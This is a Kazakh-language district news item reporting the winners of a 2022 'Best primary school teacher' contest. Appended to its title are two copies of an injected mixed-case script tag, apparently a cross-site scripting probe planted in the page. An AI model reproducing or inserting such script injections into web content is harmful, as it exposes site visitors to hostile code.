«Үздік бастауыш сынып мұғалімі»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

02.11.2022

Бастауыш сынып мұғалімдерінің белсенділігін, дербестігін және шығармашылығын ынталандыру мақсатында 21-27 қазан аралығында «Үздік бастауыш сынып мұғалімі» байқауының аудандық кезеңі өтті. Байқауда 13 бастауыш сынып мұғалімдері қатысты.Конкурстың 1-ші кезеңі «Бейнесабақ», «Портфолио» және «Мен – заманауи бастауыш сынып мұғалімімін» эссе ресімдеу шарттарынан болса, 2-ші кезеңі математикалық есептер шығару тапсырмасынан тұрды.

        Педагогтар  оқу-тәрбие үрдісінде қолданып жүрген кәсіби шеберліктері мен құзыреттілігін, қазіргі заманғы инновациялық білім беру технологияларды пайдалану тәжірибелерін ортаға салды.

Комиссия мүшелері конкурс материалдарын саралап,жеңімпаздарды анықтады.

  • 1- орынды Вознесенка жалпы орта білім беретін  мектебінің бастауыш сынып мұғалімі Стихиляс Т.В жеңіп алды. 2- орынға И.Қ. Гакашина Никольск №1 жалпы орта білім беру мектебінің  бастауыш сынып мұғалімі, 3-орынға Жуковская О.В., Макинск №1 жалпы орта білім беру мектебінің бастауыш сынып мұғалімі иеленді.
  • «Үздік бейнесабақ» номинациясы бойынша Макинск Балуан Шолақ атындағы мектеп-лицейінің бастауыш сынып мұғалімі Биғалиева З.Ж., «Үздік портфолио» номинациясына Капитоновка ЖОББМ бастауыш сынып мұғалімі Белоус Л.А., «Үздік эссе» номинациясына Макинск мектеп-гимназияның бастауыш сынып мұғалімі Байкенова М.О. иеленді.

Жеңімпаздарды құттықтаймыз! Барлық қатысушыларға алдағы уақытта үлкен жетістіктерге,табыстарға  және кәсіби шыңдарға жете берулеріңізге тілектеспіз!

 

Просмотров: 648


Пікір қосу



Деректерді қолтаңбаға қосу